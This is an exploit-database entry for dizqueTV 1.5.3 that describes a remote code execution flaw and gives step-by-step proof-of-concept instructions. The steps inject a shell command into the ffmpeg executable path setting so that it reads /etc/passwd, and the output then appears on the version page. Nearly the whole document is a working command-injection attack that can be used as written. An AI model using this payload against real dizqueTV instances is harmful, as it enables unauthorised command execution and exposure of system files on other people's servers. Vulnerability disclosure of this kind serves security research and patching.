Share
## https://sploitus.com/exploit?id=PACKETSTORM:181992
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)  
# Date: 9/21/2024  
# Exploit Author: Ahmed Said Saud Al-Busaidi  
# Vendor Homepage: https://github.com/vexorian/dizquetv  
# Version: 1.5.3  
# Tested on: linux  
  
POC:  
  
## Vulnerability Description  
  
dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.  
  
## STEPS TO REPRODUCE  
  
1. go to http://localhost/#!/settings   
  
2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"  
  
3. click on update  
  
4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd